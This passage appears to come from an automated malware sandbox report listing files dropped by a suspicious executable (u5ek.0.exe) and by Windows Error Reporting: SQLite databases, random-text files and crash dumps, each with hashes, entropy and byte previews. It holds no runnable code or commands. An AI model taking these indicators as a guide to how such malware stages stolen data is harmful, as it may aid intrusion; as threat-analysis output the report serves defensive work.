                                                                                                                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):28672
                                                                                                                                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                            Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                            MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                            SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                            SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                            SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                                            Entropy (8bit):1.1419078651632497
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:PiYzQxbFr0W7MSDjsqZrP2fVHmzuiF6Z24IO8NT:ayQxbF4W7MOjlKGzuiF6Y4IO8NT
                                                                                                                                                                                                                            MD5:D6B842E198E4EF72F3ACAE6909550E64
                                                                                                                                                                                                                            SHA1:8CC46DCF991199D9F97B32748D133164C3B11ECE
                                                                                                                                                                                                                            SHA-256:29DE5D045803540A48EB7DB4F5139F94BAB9D9CF215C5F847DD245B752274511
                                                                                                                                                                                                                            SHA-512:9F059693466A78BA8D3D82E0111C3B6C80A7961E958DEEED2C6BF3D4BBC381F9BF34577B0A7500D2EB5F246F87814AC369C9FFDADC47D7159246752402AD5B57
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.6.3.9.3.8.2.6.1.2.4.9.1.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.6.3.9.3.8.3.0.4.9.9.9.7.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.8.3.4.6.a.b.6.-.0.0.4.0.-.4.9.1.c.-.9.b.f.0.-.0.9.1.b.4.1.3.1.b.0.b.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.5.1.6.e.a.a.3.-.3.4.f.3.-.4.9.2.3.-.9.d.8.1.-.1.c.c.7.c.b.2.f.b.e.3.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.u.5.e.k...0...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.9.c.-.0.0.0.1.-.0.0.1.4.-.f.d.c.9.-.5.6.f.3.1.d.9.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.3.6.2.c.5.b.2.a.b.6.e.4.2.4.0.4.7.9.6.e.5.8.8.0.8.4.d.f.5.7.f.0.0.0.0.f.f.f.f.!.0.0.0.0.9.a.6.f.1.c.a.6.f.1.0.3.5.9.1.e.4.5.3.b.9.9.1.b.a.0.e.c.7.f.b.a.3.7.8.6.3.e.6.3.!.u.5.e.k...0...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4.
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                                            Entropy (8bit):1.0872549014470918
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:WKmc3EKt0jXFDjsqxeugCzuiF6Z24IO8CC:wc3EKujXFDjoCzuiF6Y4IO8C
                                                                                                                                                                                                                            MD5:6BBEB61522B21573EDF7B353320EC3BB
                                                                                                                                                                                                                            SHA1:3DC8D31A69A5DB2A8AA59AB95CF0A04300C518BF
                                                                                                                                                                                                                            SHA-256:E89107396EFC23FCE600B9E6B485FC944E3090D6B14ED341EE2AC2E6BFB55935
                                                                                                                                                                                                                            SHA-512:424DADCDD9CEA85EB353CA37097E16558ECF5EFFF1910200099C302B477D95E0A12517108EF9441D1BBDE7B18D4B1548A1A4A9C8E6EF82230AB8B43D7610411B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.6.3.9.3.5.2.9.3.9.7.4.4.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.6.3.9.3.5.3.6.4.2.8.7.0.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.8.2.a.b.c.5.b.-.c.1.b.4.-.4.0.0.f.-.b.f.4.1.-.7.d.2.b.0.f.c.4.f.7.8.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.8.2.a.9.9.b.f.-.4.f.4.2.-.4.c.9.4.-.a.2.8.b.-.7.4.d.c.0.f.1.c.0.c.7.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.w.x.f.S.I.z.4.P.A.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.5.c.-.0.0.0.1.-.0.0.1.4.-.b.2.7.d.-.3.a.f.0.1.d.9.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.c.a.c.a.9.d.1.1.8.e.d.b.7.0.3.a.6.0.f.2.6.6.f.6.7.d.0.8.5.a.c.0.0.0.0.f.f.f.f.!.0.0.0.0.5.f.0.2.0.e.e.f.c.6.d.5.d.a.7.e.f.e.c.d.3.1.b.d.3.9.1.1.9.1.1.1.6.9.d.9.9.0.2.1.!.w.x.f.S.I.z.4.P.A.i...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Fri Apr 26 21:09:42 2024, 0x1205a4 type
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):62146
                                                                                                                                                                                                                            Entropy (8bit):2.725323783685602
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:TqrGyLF6AgEqYzLNCSY2db4JBOTL9AlrY0:LyLhgEjEShdbEiirY
                                                                                                                                                                                                                            MD5:8260995185C794C744DD398CB6561816
                                                                                                                                                                                                                            SHA1:DDCE50A837018B9B1A58A8952F68A7A3538F88FB
                                                                                                                                                                                                                            SHA-256:8D3E15E1BB15BDEF79B2EA49C7CA28855200F707215BBC299031608B7E740B24
                                                                                                                                                                                                                            SHA-512:A6CB683DF702683E65B6154D9AE8CB3754F856A4235FD5D54669B8AFC6BC4C9EE9FF61E4D9CA9BD28E597DF05B0F9E7E80F5CA58FA7FB84F33116A157DC7E09D
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:MDMP..a..... .........,f............4............ ..<...........v9..........T.......8...........T...........`Z..b...........((...........*..............................................................................eJ.......*......GenuineIntel............T.............,f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):6304
                                                                                                                                                                                                                            Entropy (8bit):3.7206516318365965
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJiT6tXEy8YXXPpDM89bCGsfuWm:R6lXJe6lyYXTClfm
                                                                                                                                                                                                                            MD5:670F6BEBD1C4FC419CFFE0D915C2F0DC
                                                                                                                                                                                                                            SHA1:BF3354F8280800140FBE0DA770F77C1A31FBC518
                                                                                                                                                                                                                            SHA-256:5705BC638BA7BB608A850D0F73A27E316571A02074DF77B9C1A78CDCB961C377
                                                                                                                                                                                                                            SHA-512:23A9EAF4CA12450C3C6713493AC08A898A09362B63289EA0EBA72E183F7DD917CA7445085ADC1748D030E3A815D6DC35D2F6D42D4CF8CE319A4C12F6F6ECDD1C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.8.4.<./.P.i.
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4551
                                                                                                                                                                                                                            Entropy (8bit):4.438150937922383
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsYJg77aI9BeWpW8VY5jXoYm8M4JVmwVFi+q8uhTRncd9d:uIjfeI77f7VATFJApcd9d
                                                                                                                                                                                                                            MD5:F0A4EF625A1B75533DC767AA4FB3B031
                                                                                                                                                                                                                            SHA1:D40661D09383CAE1903AB3A09A34D6EB40B8161F
                                                                                                                                                                                                                            SHA-256:288B98F7A5DD6DE8C67FA6809ADBA9AAFD064E6AD13F2C52D213EBB224CB21C1
                                                                                                                                                                                                                            SHA-512:2CDE43CB85471C43C507100916DA55E768642B6F49E96ECD2B96D4FC92E0D358AC810AD9BF33A0B6525CFDDAAF43BAF66110E57AF907937FCF37865A8FF37220
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="297372" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:Mini DuMP crash report, 15 streams, Fri Apr 26 21:09:13 2024, 0x1205a4 type
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):51039
                                                                                                                                                                                                                            Entropy (8bit):2.954821315281418
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:H85CNTpm0XiWOfnE1R52rURV/hFN6P7CMzLCddHw:u+g0XiWOfnE1GrBCM6dO
                                                                                                                                                                                                                            MD5:3FEC39CDE4919D58CBEE48ACD10873D2
                                                                                                                                                                                                                            SHA1:CEED3F2865B483A78B4DFB998C9EECC16315D1C4
                                                                                                                                                                                                                            SHA-256:EFA9273F295F2C6A9A5A7D0AAAB64391C34848968E5C9C593D265053FF8E4085
                                                                                                                                                                                                                            SHA-512:B92376E86E69FA3E48A87BC74843B961627249CD215A9EC8D7FB08C463DE087F88EDBC79DA82BAD1BFE8AEC1B2F8DF59EED0AC065AC4565A6287816633F516EA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:MDMP..a..... .........,f............4...........H...H.......d....#......T...D?..........`.......8...........T............:..W............(...........*..............................................................................eJ......x+......GenuineIntel............T.......\.....,f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):8398
                                                                                                                                                                                                                            Entropy (8bit):3.6962497856011782
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJlFU6EGj6Y9lSU9eI7Cgmfj8pDQ89bunsfd6m:R6lXJE6EGj6YvSU9eKCgmfj8usfh
                                                                                                                                                                                                                            MD5:A08E7EEC2E6FA9E6DE566A155BF38C2D
                                                                                                                                                                                                                            SHA1:A924D1A7F0D2AA64750A7F2CC92279FBCD15CE3C
                                                                                                                                                                                                                            SHA-256:DA3950899CBD51C2502EBB05F7C5394D24525AC43B20D9CE412895947488696B
                                                                                                                                                                                                                            SHA-512:05F007622A15051878B3B289687DC8B73A893B4643000B16C991ABB9CEE7BA12F0F330EE2CB8E2D2F1CF0BFEB0B66DE5F7032C02B0EFE8D89C2291B761878423
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.0.4.<./.P.i.
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4680
                                                                                                                                                                                                                            Entropy (8bit):4.462710315153584
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zspJg77aI9BeWpW8VY52PYm8M4J3GtXFG+q8vtGtVe5hMd:uIjf7I77f7VA2SJZKiehMd
                                                                                                                                                                                                                            MD5:985248893CC8F1EDE9CD4BBE125CA04B
                                                                                                                                                                                                                            SHA1:909F55796315FBD26EDD8C8FE826FCA10D5EC3DE
                                                                                                                                                                                                                            SHA-256:F24363611B8E821FF83C325C062FEFE0F500F1245C3E7EB2ED9026FE761B3FF2
                                                                                                                                                                                                                            SHA-512:30A394A0B6E13C01C6DA20A9AA6E88C6E97E5DCD70A18CA498FE455F4008E99000089BBE7E84D9ECBB663CB4D09A8DA010DED6DC56B1EB4E43948B615A90BEBA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="297371" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                            Entropy (8bit):4.70435191336402
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix
                                                                                                                                                                                                                            MD5:8C1F71001ABC7FCE68B3F15299553CE7
                                                                                                                                                                                                                            SHA1:382285FB69081EB79C936BC4E1BFFC9D4697D881
                                                                                                                                                                                                                            SHA-256:DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE
                                                                                                                                                                                                                            SHA-512:8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVPHWPWLYJIOFFNQHAOBSRORLXUKIHEETKPFDPHQAGTKOMEWPBYGMTXHOQFINPIQARIVGCFUFIETTFUMCUDHRHCSTIZWRDJEHWOLAFOSWAVIGSWONBSKFWHCQAGHLWBKAFUQUULJRVZNUGGVOCCVTTWZEZFPJKZDJMHDYXQKDPLRECPAAEZVBXFDGZJIUGNMOEAISGBSPVTDRADHODLAXUFWZVTJPIGKERLENNAJHHHNNAPBWXCOGJSNVQJJEEPSMESQKGYOHXVMZQNSMSJHQHSGCJZCBZJXMLGNQQKZRIQSQCAWXZFCRMGMMLKHZDWNQTXPTYWGWNQQEQWEZJPQVPOASQIIJYWPUVLHFSLMGHWITYEKRNYGXYTAJZSRGYUWTMRNOICIEPMAYUOIDDOUSYSPAILYQQLYDTBOTEDGSCNXDRRQMOBWCQMDCQXTPEXDKPLVRMFZSKERSAULAYLSOJGDMFTZECKZYYLQVVDOMXISCOBUPPSAYUFOWOCBDJALHRAXDIKEMRYGQMEYTENAHXKWSVJEDEJTIUWZDHLIBKQRVMQLSAYIIOZDWWOLHCJUVJVRYJLTIENWCTYDOSJVSFUHOQPOXCMFGTAWFRCZJNYBCRPUFRUMZIBQDOVOBMFCHMMFHSSJZDCZNMWNCNSQMZWHCOEYNCAFONSABBQCKAPFWJIGKNUCUJZWUKRWIOFVWQWFSYAHDWXEMJKFZYMRVIRAMPVKBXONBJFTXIBDAYIE
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                            Entropy (8bit):4.70435191336402
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix
                                                                                                                                                                                                                            MD5:8C1F71001ABC7FCE68B3F15299553CE7
                                                                                                                                                                                                                            SHA1:382285FB69081EB79C936BC4E1BFFC9D4697D881
                                                                                                                                                                                                                            SHA-256:DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE
                                                                                                                                                                                                                            SHA-512:8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7
                                                                                                                                                                                                                            Malicious:false
